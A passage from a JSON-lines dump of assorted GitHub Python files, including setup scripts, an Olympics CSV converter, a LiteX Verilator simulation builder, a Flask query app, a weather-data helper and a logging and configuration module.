np.asarray(Image.open(root_dir+'/output/'+str(idx+1)+'.jpg'))\n\timg2 = np.asarray(Image.open(root_dir+'/target/'+str(idx+1)+'.jpg'))\n\tssim_list.append(StructuralSimilarityIndex(img1,img2))\n\trmsd_list.append(RootMeanSquareDeviation(img1,img2))\n\nprint('Avg. SSIM: '+ str(np.mean(ssim_list)))\nprint('Avg. 
RMSD: '+ str(np.mean(rmsd_list)))","repo_name":"darth-c0d3r/pix2pix","sub_path":"eval_metrics.py","file_name":"eval_metrics.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73036340967","text":"from __future__ import print_function\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test as TestCommand\nimport io\nimport codecs\nimport os\nimport sys\n\nimport CosmoPhotoz.photoz as photoz\n\nhere = os.path.abspath(os.path.dirname(__file__))\ndef readin(*filenames, **kwargs):\n    encoding = kwargs.get('encoding', 'utf-8')\n    sep = kwargs.get('sep', '\\n')\n    buf = []\n    for filename in filenames:\n        with io.open(filename, encoding=encoding) as f:\n            buf.append(f.read())\n    return sep.join(buf)\n\n# Convert the github markup to pypi reStructuredText\n# try:\n#     import pypandoc\n#     long_description = pypandoc.convert(source=readin('README.md'), to='rst', format='md')\n# except ImportError:\n#     print(\"warning: pypandoc module not found, could not convert Markdown to RST\")\n\nlong_description = readin('README.rst')\n\n#class PyTest(TestCommand):\n#    def finalize_options(self):\n#        TestCommand.finalize_options(self)\n#        self.test_args = []\n#        self.test_suite = True\n#\n#    def run_tests(self):\n#        import pytest\n#        errcode = pytest.main(self.test_args)\n#        sys.exit(errcode)\n\n\n#tests_require=['pytest'],\n#cmdclass={'test': PyTest},\n#test_suite='sandman.test.test_sandman',\n#extras_require={\n#    'testing': ['pytest'],\n#}\n\n\nsetup(\n    name='CosmoPhotoz',\n    version=photoz.__version__,\n    url='http://github.com/COINtoolbox/COSMOPhotoz/CosmoPy',\n    license='GNU Public License',\n    author=photoz.__author__,\n    install_requires=['matplotlib>=1.3.1',\n                      'numpy>=1.8.2',\n                      'pandas>=0.14.1',\n                      'patsy>=0.3.0',\n                      'scikit-learn>=0.15.1',\n                      'scipy>=0.14.0',\n                      'seaborn>=0.3.1',\n                      'statsmodels>=0.5.0'],\n    author_email=photoz.__email__,\n    description=photoz.__doc__,\n    long_description=long_description,\n    packages=['CosmoPhotoz'],\n    package_dir = {'CosmoPhotoz': 'CosmoPhotoz', 'data': 'CosmoPhotoz/data'},\n    package_data = {'CosmoPhotoz': ['data/PHAT0.csv.bz2']},\n    include_package_data = True,\n    scripts=['CosmoPhotoz/run_glm.py'],\n    platforms='any',\n    classifiers = [\n        'Programming Language :: Python',\n        'Development Status :: 3 - Alpha',\n        'Natural Language :: English',\n        'Environment :: X11 Applications',\n        'Intended Audience :: Science/Research',\n        'License :: OSI Approved :: GNU General Public License (GPL)',\n        'Operating System :: OS Independent',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n        'Topic :: Scientific/Engineering :: Astronomy',\n        ],\n)\n","repo_name":"COINtoolbox/CosmoPhotoz","sub_path":"Python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14610289739","text":"'''\n    convert.py\n    Carl Zhang, 12 Oct 2022\n\n    The data was accessed here:\n    https://www.kaggle.com/datasets/heesoo37/120-years-of-olympic-history-athletes-and-results\n    To run this code, type python3 convert.py in terminal\n    with the above dataset (athlete_events.csv) in your \n    working directory\n    \n    Once running this file, there will be multiple csv files\n    saved to your working directory. 
You will use these csv's\n copying their data to the database tables listed in the\n 'olympics-schema.sql'.\n\n Once this has been done, go to the 'queries.sql' file to\n see the next steps.\n'''\n\nimport csv\n\n# CREATE TABLE athletes (\n# athlete_id INTEGER,\n# fullname TEXT,\n# sex TEXT,\n# team TEXT,\n# noc TEXT,\n# sport TEXT\n# );\n\nathletes = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('athletes.csv', 'w') as athletes_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(athletes_file)\n heading_row = next(reader)\n for row in reader:\n athlete_id = row[0]\n fullname = row[1]\n athlete_sex = row[2]\n team = row[6]\n noc = row[7]\n sport = row[12]\n if athlete_id not in athletes:\n athletes[athlete_id] = fullname\n writer.writerow([athlete_id, fullname, athlete_sex, team, noc, sport])\n\n# CREATE TABLE events (\n# id SERIAL,\n# event TEXT\n# );\n\nevents = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('events.csv', 'w') as events_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(events_file)\n heading_row = next(reader) # eat up and ignore the heading row of the data file\n for row in reader:\n event_name = row[13]\n if event_name not in events:\n event_id = len(events) + 1\n events[event_name] = event_id\n writer.writerow([event_id, event_name])\n\n# CREATE TABLE games (\n# id SERIAL,\n# game TEXT\n# );\n\ngames = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('games.csv', 'w') as games_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(games_file)\n heading_row = next(reader)\n for row in reader:\n game_name = row[8]\n if game_name not in games:\n game_id = len(games) + 1\n games[game_name] = game_id\n writer.writerow([game_id, game_name])\n\n# CREATE TABLE event_results (\n# athlete_id INTEGER,\n# game_id INTEGER,\n# event_id INTEGER,\n# medal TEXT\n# );\n\nwith open('athlete_events.csv') as original_data_file,\\\n open('event_results.csv', 'w') as event_results_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(event_results_file)\n heading_row = next(reader)\n for row in reader:\n athlete_id = row[0]\n game_id = games[row[8]]\n event_id = events[row[13]]\n medal = row[14]\n writer.writerow([athlete_id, game_id, event_id, medal])\n\n\n# CREATE TABLE games_traits (\n# game_id INTEGER,\n# year INTEGER,\n# season TEXT,\n# city TEXT\n# );\n\ngames_ids = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('game_traits.csv', 'w') as games_traits_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(games_traits_file)\n heading_row = next(reader)\n for row in reader:\n game_id = games[row[8]]\n year = row[9]\n season = row[10]\n city = row[11]\n if game_id not in games_ids:\n games_ids[game_id] = 1\n writer.writerow([game_id, year, season, city])\n\n# CREATE TABLE medal_count (\n# noc_id integer\n# gold integer\n# silver integer\n# bronze integer\n# );\n\nnocs = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('medal_counts.csv', 'w') as medal_counts_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(medal_counts_file)\n heading_row = next(reader)\n for row in reader:\n noc_name = row[7]\n if noc_name not in nocs:\n # first index for gold\n # second index for silver\n # third index for bronze\n # fourth index for id\n noc_medals = [0,0,0,0]\n nocs[noc_name] = noc_medals\n nocs[noc_name][3] = len(nocs)\n elif noc_name in nocs:\n if row[14].lower() == 'gold':\n nocs[noc_name][0] 
+= 1\n elif row[14].lower() == 'silver':\n nocs[noc_name][1] += 1\n elif row[14].lower() == 'bronze':\n nocs[noc_name][2] += 1\n # the array stored is now accessed through iterating the dictionary\n # by noc_name and writing onto the csv with the desired information.\n for key in nocs:\n writer.writerow([nocs[key][3], key, nocs[key][0], nocs[key][1], nocs[key][2]])\n\n# CREATE TABLE nocs (\n# id SERIAL,\n# noc_name TEXT\n# );\n\nnocs = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('nocs.csv', 'w') as nocs_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(nocs_file)\n heading_row = next(reader)\n for row in reader:\n noc_name = row[7]\n if noc_name not in nocs:\n noc_id = len(nocs) + 1\n nocs[noc_name] = noc_id\n writer.writerow([noc_id, noc_name])","repo_name":"czhang2884/cs257","sub_path":"olympics/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25613511472","text":"import setuptools\n\nwith open('README.md', \"r\") as readme:\n long_description = readme.read()\n\nsetuptools.setup(\n name=\"simple-paramiko\",\n version=\"0.0.1\",\n author=\"Sergey Parshin\",\n author_email=\"parshinsp@gmail.com\",\n description=\"Simplified Paramiko connection package. That allows command execution without any configuration headache.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Shooshp/simple-paramiko\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ]\n)\n","repo_name":"Shooshp/simple-paramiko","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37516129423","text":"import numpy\nimport matplotlib.pyplot as plt\nimport os\nfrom os.path import dirname, join, exists\ncurdir = dirname(__file__)\n\n\"\"\"\nPlot experimental slope\n\"\"\"\n\n\ndef get_time(string):\n string = string.decode(\"ascii\")\n h, m, s = map(float, string.split(\":\"))\n return 3600 * h + 60 * m + 1 * s\n \ndata = numpy.genfromtxt(join(curdir, \"../data/exp/diffusion-slope.csv\"),\n converters={1: get_time},\n delimiter=\",\")\n\nplt.figure(figsize=(3, 3 * 0.8))\nplt.style.use(\"science\")\ncond = numpy.where(data[:, 1] < 3600)\n# plt.plot(data[:, 1][cond] / 3600, data[:, 2][cond] / 1e-3)\n# plt.plot(data[:, 1][data[:, 1] > 7200] / 3600, data[:, 2][data[:, 1] > 7200] / 1e-3)\nplt.plot(data[:, 1] / 3600, data[:, 2] / 1e-3)\nplt.xlabel(\"t (h)\")\nplt.ylabel(\"Conductivity\")\nplt.savefig(join(curdir, \"../img/diffusion-slope.svg\"))\n","repo_name":"alchem0x2A/paper.gr_nanopore","sub_path":"data/plots/src/plot_diffusion_slope.py","file_name":"plot_diffusion_slope.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70634116649","text":"import numpy as np\nimport pandas as pd\nfrom technotrader.trading.agent import Agent\nimport technotrader.utils.agent_utils as agent_utils\n\n\nclass TrendFollowRiskManager(Agent):\n \"\"\"\n Risk Manager base on Trend Tracking.\n Returns weights: the greater the weights is\n the less risky is the asset.\n \"\"\"\n def __init__(self, config, data_loader, trade_log=None):\n 
super().__init__(config, data_loader)\n        self.instruments_list = config[\"instruments_list\"]\n        self.verbose = False\n        if config.get(\"verbose\") is not None:\n            if config[\"verbose\"]:\n                self.verbose = True\n        self.window_long = config['window_long']\n        self.window_short = config['window_short']\n        assert self.window_long > self.window_short, \\\n            \"window_long must be greater than window_short\"\n        self.down_trend_threshold = config[\"down_trend_threshold\"]\n        self.n_inst = len(self.instruments_list)\n        timetable = agent_utils.ExchangeTimetable(config[\"exchange\"])\n        self.data_extractor = agent_utils.DataExtractor(data_loader,\n            timetable, config, self.window_long + 1, False)\n        self.previous_trends = None\n        self.down_trend_counter = np.zeros(len(self.instruments_list))\n\n    def check_trend(self, data):\n        long_mean = np.mean(data[-self.window_long:], axis=0)\n        short_mean = np.mean(data[-self.window_short:], axis=0)\n        trends = short_mean >= long_mean\n        # check if previous trends still continue\n        prev_trends = self.previous_trends\n\n        self.down_trend_counter[trends] = 0\n        self.down_trend_counter[~trends] += 1\n\n        weights = np.ones(self.n_inst)\n        weights[self.down_trend_counter >= self.down_trend_threshold] = 0.\n\n        self.previous_trends = trends\n        return weights\n\n    def compute_risks(self, epoch):\n        data_prices = self.data_extractor(epoch)\n        weights = self.check_trend(data_prices)\n        if self.verbose:\n            print(\"risk weights:\", weights)\n        preds_dict = {}\n        for i, instrument in enumerate(self.instruments_list):\n            preds_dict[instrument] = weights[i]\n        return preds_dict\n","repo_name":"kolomeytsev/technotrader","sub_path":"risk_managers/risk_trend_follow.py","file_name":"risk_trend_follow.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19812854647","text":"hours = int(input())\nminutes = int(input())\ntimes = int(input())\n\nwait_hours = (hours + ((times + minutes) // 60)) % 24\nwait_minutes = (times + minutes) % 60\n\n\nprint(f'{wait_hours:>02}:{wait_minutes:>02}')\n\n# 8\n# 0\n# 65\n\n# 09:05\n\n\n# 10\n# 15\n# 2752\n\n# 08:07\n","repo_name":"KaJIuHa/styding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24637289056","text":"import sys\r\nsys.path.append(\".\")\r\nfrom project.student_report_card import StudentReportCard\r\nfrom unittest import TestCase, main\r\n\r\nclass TestCard(TestCase):\r\n    def setUp(self):\r\n        self.card = StudentReportCard(\"Ivan\", 10)\r\n    \r\n    def test_constructor(self):\r\n        with self.assertRaises(ValueError) as er:\r\n            card = StudentReportCard(\"\", 10)\r\n        self.assertEqual(\"Student Name cannot be an empty string!\", str(er.exception))\r\n\r\n        with self.assertRaises(ValueError) as er:\r\n            card = StudentReportCard(\"Ivan\", 0)\r\n        self.assertEqual(\"School Year must be between 1 and 12!\", str(er.exception))\r\n\r\n        with self.assertRaises(ValueError) as er:\r\n            card = StudentReportCard(\"Ivan\", 13)\r\n        self.assertEqual(\"School Year must be between 1 and 12!\", str(er.exception))\r\n\r\n        self.assertEqual(\"Ivan\", self.card.student_name)\r\n        self.assertEqual(10, self.card.school_year)\r\n        self.assertEqual({}, self.card.grades_by_subject)\r\n\r\n        self.card.school_year = 1\r\n        self.assertEqual(1, self.card.school_year)\r\n        self.assertEqual(\"Ivan\", self.card.student_name)\r\n        self.assertEqual({}, 
self.card.grades_by_subject)\r\n\r\n self.card.school_year = 12\r\n self.assertEqual(12, self.card.school_year)\r\n self.assertEqual(\"Ivan\", self.card.student_name)\r\n self.assertEqual({}, self.card.grades_by_subject)\r\n\r\n \r\n def test_add_grade(self):\r\n self.card.add_grade(\"math\", 4)\r\n self.assertEqual({\"math\": [4]}, self.card.grades_by_subject)\r\n self.assertEqual([4], self.card.grades_by_subject[\"math\"])\r\n \r\n \r\n def test_average_grade_by_subject(self):\r\n self.card.add_grade(\"math\", 4)\r\n self.card.add_grade(\"math\", 5)\r\n self.card.add_grade(\"bio\", 5)\r\n self.assertEqual({\"math\": [4, 5], \"bio\": [5]}, self.card.grades_by_subject)\r\n self.assertEqual([4, 5], self.card.grades_by_subject[\"math\"])\r\n self.assertEqual([5], self.card.grades_by_subject[\"bio\"])\r\n msg = self.card.average_grade_by_subject()\r\n self.assertEqual(\"math: 4.50\\nbio: 5.00\", msg)\r\n\r\n def test_average_grade_for_all_subjects(self):\r\n self.card.add_grade(\"math\", 4)\r\n self.card.add_grade(\"math\", 5)\r\n self.card.add_grade(\"math\", 3)\r\n self.card.add_grade(\"math\", 6)\r\n self.card.add_grade(\"bio\", 5)\r\n self.card.add_grade(\"bio\", 2)\r\n self.card.add_grade(\"bio\", 4)\r\n self.card.add_grade(\"bio\", 6)\r\n msg = self.card.average_grade_for_all_subjects()\r\n self.assertEqual(\"Average Grade: 4.38\", msg)\r\n\r\n def test_repr(self):\r\n self.card.add_grade(\"math\", 4)\r\n self.card.add_grade(\"bio\", 5)\r\n msg = repr(self.card)\r\n expected_msg = f\"Name: Ivan\\n\" \\\r\n f\"Year: 10\\n\" \\\r\n f\"----------\\n\" \\\r\n f\"math: 4.00\\n\" \\\r\n f\"bio: 5.00\\n\" \\\r\n f\"----------\\n\" \\\r\n f\"Average Grade: 4.50\"\r\n self.assertEqual(expected_msg, msg)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Python_OOP/Exams/Hotel_Everland/Testing/project/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"13245227825","text":"import os\nimport subprocess\n\nfrom litex.gen.fhdl.structure import _Fragment\nfrom litex.build import tools\nfrom litex.build.generic_platform import *\n\n\nsim_directory = os.path.abspath(os.path.dirname(__file__))\ncore_directory = os.path.join(sim_directory, 'core')\n\n\ndef _generate_sim_h_struct(name, index, siglist):\n content = ''\n\n content += 'struct pad_s {}{}[] = {{\\n'.format(name, index)\n for signame, sigbits, dummy in siglist:\n content += ' {{ (char*)\"{}\", {}, NULL }},\\n'.format(signame, sigbits)\n content += ' { NULL, 0, NULL }\\n'\n content += '};\\n\\n'\n\n return content\n\n\ndef _generate_sim_h(platform):\n content = \"\"\"\\\n#ifndef __SIM_CORE_H_\n#define __SIM_CORE_H_\n#include \"pads.h\"\n\n\"\"\"\n for args in platform.sim_requested:\n content += _generate_sim_h_struct(*args)\n\n content += \"\"\"\\\n#ifndef __cplusplus\nvoid litex_sim_init(void **out);\n#endif\n\n#endif /* __SIM_CORE_H_ */\n\"\"\"\n tools.write_to_file(\"dut_header.h\", content)\n\n\ndef _generate_sim_cpp_struct(name, index, siglist):\n content = ''\n\n for i, (signame, sigbits, sigfname) in enumerate(siglist):\n content += ' {}{}[{}].signal = &dut->{};\\n'.format(name, index, i, sigfname)\n\n idx_int = 0 if not index else int(index)\n content += ' litex_sim_register_pads({}{}, (char*)\"{}\", {});\\n\\n'.format(name, index, name, idx_int)\n\n return content\n\n\ndef _generate_sim_cpp(platform):\n content = \"\"\"\\\n#include 
\n#include \n#include \n#include \"Vdut.h\"\n#include \n#include \"dut_header.h\"\n\nextern \"C\" void litex_sim_init(void **out)\n{\n Vdut *dut;\n\n dut = new Vdut;\n\n\"\"\"\n for args in platform.sim_requested:\n content += _generate_sim_cpp_struct(*args)\n\n content += \"\"\"\\\n *out=dut;\n}\n\"\"\"\n tools.write_to_file(\"dut_init.cpp\", content)\n\n\ndef _generate_sim_variables(include_paths):\n include = \"\"\n for path in include_paths:\n include += \"-I\"+path+\" \"\n\n content = \"\"\"\\\nSRC_DIR = {}\nINC_DIR = {}\n\"\"\".format(core_directory, include)\n tools.write_to_file(\"variables.mak\", content)\n\n\ndef _generate_sim_config(config):\n content = config.get_json()\n tools.write_to_file(\"sim_config.js\", content)\n\n\ndef _build_sim(platform, build_name, verbose):\n makefile = os.path.join(core_directory, 'Makefile')\n build_script_contents = \"\"\"\\\nrm -rf obj_dir/\nmake -C . -f {}\nmkdir -p modules && cp obj_dir/*.so modules\n\"\"\".format(makefile)\n build_script_file = \"build_\" + build_name + \".sh\"\n tools.write_to_file(build_script_file, build_script_contents, force_unix=True)\n\n p = subprocess.Popen([\"bash\", build_script_file], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n output, _ = p.communicate()\n output = output.decode('utf-8')\n if p.returncode != 0:\n error_messages = []\n for l in output.splitlines():\n if verbose or \"error\" in l.lower():\n error_messages.append(l)\n raise OSError(\"Subprocess failed with {}\\n{}\".format(p.returncode, \"\\n\".join(error_messages)))\n if verbose:\n print(output)\n\n\ndef _run_sim(build_name):\n run_script_contents = \"\"\"\\\nsudo obj_dir/Vdut\n\"\"\"\n run_script_file = \"run_\" + build_name + \".sh\"\n tools.write_to_file(run_script_file, run_script_contents, force_unix=True)\n r = subprocess.call([\"bash\", run_script_file])\n if r != 0:\n raise OSError(\"Subprocess failed\")\n\n\nclass SimVerilatorToolchain:\n def build(self, platform, fragment, build_dir=\"build\", build_name=\"top\",\n toolchain_path=None, serial=\"console\", run=True, verbose=True,\n sim_config=None):\n os.makedirs(build_dir, exist_ok=True)\n os.chdir(build_dir)\n\n if not isinstance(fragment, _Fragment):\n fragment = fragment.get_fragment()\n platform.finalize(fragment)\n\n v_output = platform.get_verilog(fragment)\n named_sc, named_pc = platform.resolve_signals(v_output.ns)\n v_output.write(\"dut.v\")\n\n include_paths = []\n for source in platform.sources:\n path = os.path.dirname(source[0]).replace(\"\\\\\", \"\\/\")\n if path not in include_paths:\n include_paths.append(path)\n include_paths += platform.verilog_include_paths\n _generate_sim_h(platform)\n _generate_sim_cpp(platform)\n _generate_sim_variables(include_paths)\n if sim_config:\n _generate_sim_config(sim_config)\n _build_sim(platform, build_name, verbose)\n\n if run:\n _run_sim(build_name)\n\n os.chdir(\"..\")\n\n return v_output.ns\n","repo_name":"rowhit/litex","sub_path":"litex/build/sim/verilator.py","file_name":"verilator.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"37201848591","text":"from flask import Flask, render_template\r\nimport sqlite3\r\n\r\napp = Flask(__name__)\r\n\r\ndef retrieve_top_customers():\r\n connection = sqlite3.connect(\"customer_orders.db\")\r\n cursor = connection.cursor()\r\n \r\n query = \"\"\"\r\n SELECT c.name, c.email, SUM(o.order_value) AS total_order_value\r\n FROM Customers c\r\n JOIN Orders o ON c.customer_id = o.customer_id\r\n 
WHERE o.order_date >= date('now', '-30 days')\r\n GROUP BY c.name, c.email\r\n HAVING COUNT(o.order_id) = 1\r\n ORDER BY total_order_value DESC\r\n LIMIT 10\r\n \"\"\"\r\n \r\n cursor.execute(query)\r\n results = cursor.fetchall()\r\n \r\n cursor.close()\r\n connection.close()\r\n \r\n return results\r\n\r\n@app.route('/top_customers')\r\ndef top_customers():\r\n customers = retrieve_top_customers()\r\n return render_template('results.html', customers=customers)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"armannakhwa/Eiosys-task","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28144898350","text":"import os\n\nwhile True:\n a= str(input('请输入一个大于6位数的整数:'))\n if a.isdigit() and len(a) > 6:\n print('输出:%s' %(a[-7:-3]))\n break\n else:\n print('不合要求,重新输入')\n\n","repo_name":"liaolibo-jay/instance","sub_path":"exercise100/e11.9.py","file_name":"e11.9.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1025380964","text":"class Solution(object):\n def hammingWeight(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n #count_bit_holder=0#were gonna update this by one everytime we encounter a 1 so that we can do 2^count_bit_holder\n # we need the length of n\n \n #this idea would have worked but for some reason the input isnt really being read properly so we hjad to goggle bthe bit manipulation.\n #tldr anding and n-1 the amount of times that and occurs will show how many 1s are in the integer\n bit_count=0\n while n>0:\n n=n&(n-1)\n bit_count+=1\n \n return bit_count","repo_name":"Amiris17/LeetCode","sub_path":"191-number-of-1-bits/191-number-of-1-bits.py","file_name":"191-number-of-1-bits.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74280810089","text":"import numpy as np\nfrom sklearn.datasets import make_blobs\n\nimport urllib\nimport json\nimport datetime\nimport calendar\nfrom os import path\nfrom collections import Counter\n\nJSON_FILE = 'weather.json'\n\nif not path.exists(JSON_FILE):\n data_url = 'https://data.townofcary.org/api/v2/catalog/datasets/rdu-weather-history/exports/json'\n\n urllib.request.urlretrieve(data_url, JSON_FILE)\n\nf = open(JSON_FILE, 'r')\nlines = f.readlines()\nf.close()\njson_data = ''.join(lines)\n\nweather = json.loads(json_data)\n\nweather_by_date = {}\n\nfor day in weather:\n dt = datetime.datetime.strptime(day['date'], '%Y-%m-%d')\n if dt.year < 2019:\n if not dt.year in list(weather_by_date.keys()):\n weather_by_date[dt.year] = {}\n if not dt.month in weather_by_date[dt.year].keys():\n weather_by_date[dt.year][dt.month] = []\n weather_by_date[dt.year][dt.month].append(day)\n \nflatten = lambda l: [item for sublist in l for item in sublist]\n\nMONTHS = np.array([calendar.month_abbr[m] for m in (np.arange(12) + 1)])\n\ndef monthly_data_by_key(month=1, key='precipitation'):\n monthly_data = flatten([weather_by_date[year][month] for year in weather_by_date.keys()])\n return [day[key] for day in monthly_data]\n\ndef data_by_key(year=2018, key='precipitation'):\n return flatten([weather_by_date[year][month] for month in np.arange(1, 13)])\n\ndef monthly_data_values_by_key(month=1, key='precipitation'):\n monthly_data = flatten([weather_by_date[year][month] for year in 
weather_by_date.keys()])\n    return [day[key] for day in monthly_data]\n\ndef monthly_freq_counts(month=1, key='precipitation'):\n    data = np.array(monthly_data_by_key(month=month, key=key))\n    l_bound = np.min(data)\n    u_bound = np.max(data)\n    intervals = np.linspace(l_bound, u_bound, 11)\n    freq = Counter()\n    \n    for point in data:\n        for index, interval in enumerate(intervals):\n            if point < interval:\n                freq[index] += 1\n                break\n    \n    return [freq[key] for key in sorted(freq.keys())]\n\ndef precip_sums_for_year(year=2018):\n    if year not in sorted(list(weather_by_date.keys())):\n        raise IndexError('Invalid year')\n    weather_for_year = weather_by_date[year]\n    return sorted(zip(weather_for_year.keys(), [sum([day['precipitation'] for day in weather_for_year[month]]) for month in weather_for_year.keys()]))\n\ndef temps_by_month_for_year(year=2018):\n    if year not in sorted(list(weather_by_date.keys())):\n        raise IndexError('Invalid year')\n    the_weather = weather_by_date[year]\n    the_weather = dict(zip(sorted(the_weather.keys()), [[day['temperaturemax'] for day in the_weather[month]] for month in sorted(the_weather.keys())]))\n    for key in the_weather.keys():\n        if len(the_weather[key]) < 31:\n            the_weather[key]\n    \n\ndef get_wind_points():\n    avg_wind = monthly_data_by_key(month=1, key='avgwindspeed')\n    fast_wind = monthly_data_by_key(month=1, key='fastest5secwindspeed')\n    \n    points = list(zip(avg_wind, fast_wind))\n    points = np.array([point for point in points if point[0] is not None and point[1] is not None])\n    for _ in range(5):\n        mindex = np.argmax(points[:,1])\n        points = np.delete(points, mindex, 0)\n    return points\n\ndef get_blobs():\n    return make_blobs(n_samples=200, centers=5)\n\ndef get_normal_counts(n_samples=10000):\n    data = np.random.randn(n_samples)\n    freq = Counter()\n    \n    l_bound = np.min(data)\n    u_bound = np.max(data)\n    intervals = np.linspace(l_bound, u_bound, 21)\n    \n    for point in data:\n        for index, interval in enumerate(intervals):\n            if point < interval:\n                freq[index] += 1\n                break\n    \n    return [freq[key] for key in sorted(freq.keys())]\n    \n    ","repo_name":"ceth-x86/datascience","sub_path":"matplotlib/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"1013792384","text":"import os\nimport platform\nimport sys\nimport time\nfrom configparser import ConfigParser\n\n\n# def MyLogger():\n#     logger = logging.getLogger(__name__)\n#     logger.setLevel(logging.INFO)\n#     ch = logging.StreamHandler()\n#     ch.setLevel(logging.INFO)\n#     logger.addHandler(ch)\n#     return logger\n\ndef mini_conf():\n    cwd = os.path.dirname(os.path.dirname(__file__))\n    path = [os.path.join(cwd, 'embyToLocalPlayer' + ext) for ext in (\n        f'-{platform.system()}.ini', '.ini', '_config.ini')]\n    path = [i for i in path if os.path.exists(i)][0]\n    config = ConfigParser()\n    config.read(path, encoding='utf-8-sig')\n    return config\n\n\nraw_stdout = sys.stdout\n\n\nclass Stdout:\n\n    def __init__(self):\n        self.log_file = mini_conf().get('dev', 'log_file', fallback='')\n        if self.log_file:\n            if self.log_file.startswith('./'):\n                cwd = os.path.dirname(os.path.dirname(__file__))\n                self.log_file = os.path.join(cwd, self.log_file.split('./', 1)[1])\n            mode = 'a' if os.path.exists(self.log_file) and os.path.getsize(self.log_file) < 10 * 1024000 else 'w'\n            if not os.path.exists(self.log_file):\n                os.makedirs(os.path.dirname(self.log_file), exist_ok=True)\n            self.log_file = open(self.log_file, mode, encoding='utf-8')\n\n    def 
write(self, *args, end=''):\n log = str(*args) + end\n if MyLogger.need_mix:\n log = MyLogger.mix_args_str(log)[0]\n raw_stdout.write(log)\n if self.log_file:\n self.log_file.write(log)\n self.log_file.flush()\n\n def flush(self):\n pass\n\n\nif mini_conf().get('dev', 'log_file', fallback=''):\n sys.stdout = Stdout()\n sys.stderr = sys.stdout\n\n\nclass MyLogger:\n need_mix = True\n api_key = '_hide_api_key_'\n netloc = '_mix_netloc_'\n netloc_replace = '_mix_netloc_'\n user_name = os.getlogin()\n\n def __init__(self):\n self.debug_mode = configs.debug_mode\n\n @staticmethod\n def mix_host_gen(netloc):\n host, *port = netloc.split(':')\n port = ':' + port[0] if port else ''\n new = host[:len(host) // 2] + '_mix_host_' + port\n return new\n\n @staticmethod\n def mix_args_str(*args):\n return [str(i).replace(MyLogger.api_key, '_hide_api_key_')\n .replace(MyLogger.netloc, MyLogger.netloc_replace)\n .replace(MyLogger.user_name, '_hide_user_')\n for i in args]\n\n @staticmethod\n def log(*args, end=None, silence=False):\n if silence:\n return\n t = f\"[{time.strftime('%D %H:%M:%S', time.localtime())}] \"\n args = ' '.join(str(i) for i in args)\n print(t + args, end=end)\n\n def info(self, *args, end=None, silence=False):\n if not silence and MyLogger.need_mix:\n args = self.mix_args_str(*args)\n self.log(*args, end=end, silence=silence)\n\n def debug(self, *args, end=None, silence=False):\n if self.debug_mode:\n self.log(*args, end=end, silence=silence)\n\n def error(self, *args, end=None, silence=False):\n self.log(*args, end=end, silence=silence)\n\n\nclass Configs:\n\n def __init__(self):\n self.platform = platform.system()\n self.cwd = os.path.dirname(os.path.dirname(__file__))\n self.path = [os.path.join(self.cwd, 'embyToLocalPlayer' + ext) for ext in (\n f'-{self.platform}.ini', '.ini', '_config.ini')]\n self.path = [i for i in self.path if os.path.exists(i)][0]\n MyLogger.log(MyLogger.mix_args_str(f'Python path: {sys.executable}'))\n MyLogger.log(MyLogger.mix_args_str(f'ini path: {self.path}'))\n 